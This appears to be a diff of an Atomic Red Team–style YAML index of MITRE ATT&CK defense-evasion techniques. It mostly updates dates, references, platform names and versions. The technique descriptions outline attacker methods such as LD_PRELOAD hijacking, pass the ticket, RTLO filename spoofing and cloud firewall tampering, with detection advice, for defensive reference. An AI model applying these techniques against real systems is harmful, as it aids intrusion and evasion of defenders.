       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1535:
@@ -7718,7 +7855,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.001:
     technique:
@@ -7785,7 +7921,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1027.001
     atomic_tests:
     - name: Pad Binary to Change Hash - Linux/macOS dd
@@ -7857,7 +7992,7 @@ defense-evasion:
         name: sh
   T1484.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-23T22:11:01.884Z'
       name: 'Domain Policy Modification: Group Policy Modification'
       description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
         the intended discretionary access controls for a domain, usually with the
@@ -7893,6 +8028,10 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Tristan Bennett, Seamless Intelligence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
 
@@ -7904,16 +8043,12 @@ defense-evasion:
 
 
         GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Tristan Bennett, Seamless Intelligence
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Active Directory: Active Directory Object Creation'
@@ -7949,12 +8084,12 @@ defense-evasion:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Harmj0y SeEnableDelegationPrivilege Right
         description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
-          You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
-        url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+          You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
       - source_name: TechNet Group Policy Basics
         description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
           Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -7962,14 +8097,13 @@ defense-evasion:
         url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.001
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -7984,6 +8118,7 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -7992,18 +8127,18 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -8035,14 +8170,11 @@ defense-evasion:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -8163,7 +8295,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests:
     - name: Shared Library Injection via /etc/ld.so.preload
@@ -8312,12 +8443,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.001
     atomic_tests: []
   T1222:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T17:54:06.038Z'
       name: File and Directory Permissions Modification
       description: "Adversaries may modify file or directory permissions/attributes
         to evade access control lists (ACLs) and access protected files.(Citation:
@@ -8414,12 +8544,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222
     atomic_tests: []
   T1548:
     technique:
-      modified: '2024-04-15T20:52:09.908Z'
+      modified: '2024-10-15T15:32:21.811Z'
       name: Abuse Elevation Control Mechanism
       description: 'Adversaries may circumvent mechanisms designed to control elevate
         privileges to gain higher-level permissions. Most modern systems contain native
@@ -8451,11 +8580,10 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - IaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'User Account: User Account Modification'
@@ -8496,11 +8624,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T21:14:37.714Z'
       name: Create Process with Token
       description: |-
         Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)
@@ -8556,12 +8683,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.002
     atomic_tests: []
   T1548.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-15T18:43:20.995Z'
       name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
       description: |-
         An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -8618,7 +8744,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.001
     atomic_tests:
     - name: Make and modify binary from C source
@@ -8869,7 +8994,7 @@ defense-evasion:
         description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November
           20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit
           Against Russian Banks. Retrieved March 7, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:52:49.877Z'
       name: 'Signed Binary Proxy Execution: Odbcconf'
       description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious
         payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
@@ -8902,13 +9027,11 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.008
     atomic_tests: []
   T1548.005:
     technique:
-      modified: '2024-03-28T15:30:09.313Z'
+      modified: '2024-10-15T16:07:49.519Z'
       name: Temporary Elevated Cloud Access
       description: "Adversaries may abuse permission configurations that allow them
         to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -8970,10 +9093,9 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -9031,7 +9153,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.013:
     technique:
@@ -9073,7 +9194,7 @@ defense-evasion:
         description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
           December 20, 2017.
         source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:43:48.848Z'
       name: Process Doppelgänging
       description: "Adversaries may inject malicious code into process via process
         doppelgänging in order to evade process-based defenses as well as possibly
@@ -9132,41 +9253,10 @@ defense-evasion:
       - Administrator
       - SYSTEM
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1578.003:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
-      type: attack-pattern
-      created: '2020-06-16T17:23:06.508Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.003
-        url: https://attack.mitre.org/techniques/T1578/003
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS CloudTrail Search
-        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
-        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
-          Retrieved June 17, 2020.
-      - source_name: Azure Activity Logs
-        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
-        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
-          2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.415Z'
       name: Delete Cloud Instance
       description: |-
         An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
@@ -9175,20 +9265,50 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
 
         In AWS, CloudTrail logs capture the deletion of an instance in the <code>TerminateInstances</code> event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of <code>gcloud compute instances delete</code> to delete a VM.(Citation: Cloud Audit Logs)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Instance: Instance Metadata'
       - 'Instance: Instance Deletion'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+      created: '2020-06-16T17:23:06.508Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/003
+        external_id: T1578.003
+      - source_name: AWS CloudTrail Search
+        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+          Retrieved June 17, 2020.
+        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure Activity Logs
+        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+          2020.
+        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1574.005:
     technique:
@@ -9218,7 +9338,7 @@ defense-evasion:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -9253,8 +9373,6 @@ defense-evasion:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1562.006:
     technique:
@@ -9345,7 +9463,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.006
     atomic_tests:
     - name: Auditing Configuration Changes on Linux Host
@@ -9472,7 +9589,7 @@ defense-evasion:
         elevation_required: true
   T1562.007:
     technique:
-      modified: '2023-04-15T00:25:36.502Z'
+      modified: '2024-10-16T19:38:57.374Z'
       name: Disable or Modify Cloud Firewall
       description: "Adversaries may disable or modify a firewall within a cloud environment
         to bypass controls that limit access to cloud resources. Cloud firewalls are
@@ -9480,19 +9597,25 @@ defense-evasion:
         Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
         typically utilize restrictive security groups and firewall rules that only
         allow network activity from trusted IP addresses via expected ports and protocols.
-        An adversary may introduce new firewall rules or policies to allow access
-        into a victim cloud environment. For example, an adversary may use a script
-        or utility that creates new ingress rules in existing security groups to allow
-        any TCP/IP connectivity, or remove networking limitations to support traffic
-        associated with malicious activity (such as cryptomining).(Citation: Expel
-        IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials
-        2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications,
-        lateral movement, and/or data exfiltration that would otherwise not be allowed."
+        An adversary with appropriate permissions may introduce new firewall rules
+        or policies to allow access into a victim cloud environment and/or move laterally
+        from the cloud control plane to the data plane. For example, an adversary
+        may use a script or utility that creates new ingress rules in existing security
+        groups (or creates new security groups entirely) to allow any TCP/IP connectivity
+        to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud
+        Compute Credentials 2022) They may also remove networking limitations to support
+        traffic associated with malicious activity (such as cryptomining).(Citation:
+        Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute
+        Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary
+        C2 communications, lateral movement, and/or data exfiltration that would otherwise
+        not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110)
+        or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
       x_mitre_contributors:
       - Expel
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor cloud logs for modification or creation of new security
         groups or firewall rules.
@@ -9501,7 +9624,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Firewall: Firewall Disable'
       - 'Firewall: Firewall Rule Modification'
@@ -9524,9 +9647,8 @@ defense-evasion:
         url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.002:
     technique:
@@ -9559,7 +9681,7 @@ defense-evasion:
         description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
           - Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
           Retrieved April 22, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T21:01:59.733Z'
       name: Right-to-Left Override
       description: |-
         Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>.(Citation: Infosecinstitute RTLO Technique)
@@ -9578,8 +9700,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542.002:
     technique:
@@ -9610,7 +9730,7 @@ defense-evasion:
           health and make sure it's not already dying on you. Retrieved October 2,
           2018.
         source_name: ITWorld Hard Disk Health Dec 2014
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-01T20:43:55.632Z'
       name: Component Firmware
       description: |-
         Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -9640,12 +9760,10 @@ defense-evasion:
       - SYSTEM
       x_mitre_system_requirements:
       - Ability to update component device firmware from the host operating system.
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:59:22.125Z'
       name: Indicator Removal on Host
       description: |-
         Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
@@ -9671,9 +9789,8 @@ defense-evasion:
       - Windows
       - Containers
       - Network
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Scheduled Job: Scheduled Job Modification'
       - 'File: File Modification'
@@ -9704,14 +9821,13 @@ defense-evasion:
         external_id: T1070
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070
     atomic_tests: []
   T1550.003:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T15:21:09.330Z'
       name: 'Use Alternate Authentication Material: Pass the Ticket'
       description: |-
         Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -9731,6 +9847,7 @@ defense-evasion:
       x_mitre_contributors:
       - Vincent Le Toux
       - Ryan Becwar
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
 
@@ -9738,7 +9855,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -9754,34 +9870,35 @@ defense-evasion:
       id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
       created: '2020-01-30T17:03:43.072Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1550/003
         external_id: T1550.003
-      - source_name: ADSecurity AD Kerberos Attacks
-        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
-          Kerberos Attacks. Retrieved June 2, 2016.
-        url: https://adsecurity.org/?p=556
-      - source_name: GentilKiwi Pass the Ticket
-        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
-          2, 2016.
-        url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: CERT-EU Golden Ticket Protection
+        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       - source_name: Campbell 2014
         description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
           4, 2014.
         url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+      - source_name: GentilKiwi Pass the Ticket
+        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+          12, 2024.
+        url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: ADSecurity AD Kerberos Attacks
+        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+          Kerberos Attacks. Retrieved June 2, 2016.
+        url: https://adsecurity.org/?p=556
       - source_name: Stealthbits Overpass-the-Hash
         description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
           Attacks. Retrieved February 4, 2021.
         url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
-      - source_name: CERT-EU Golden Ticket Protection
-        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
-          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
-        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1550.003
     atomic_tests: []
   T1036.004:
@@ -9847,7 +9964,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.004
     atomic_tests:
     - name: linux rename /proc/pid/comm using prctl
@@ -9938,7 +10054,7 @@ defense-evasion:
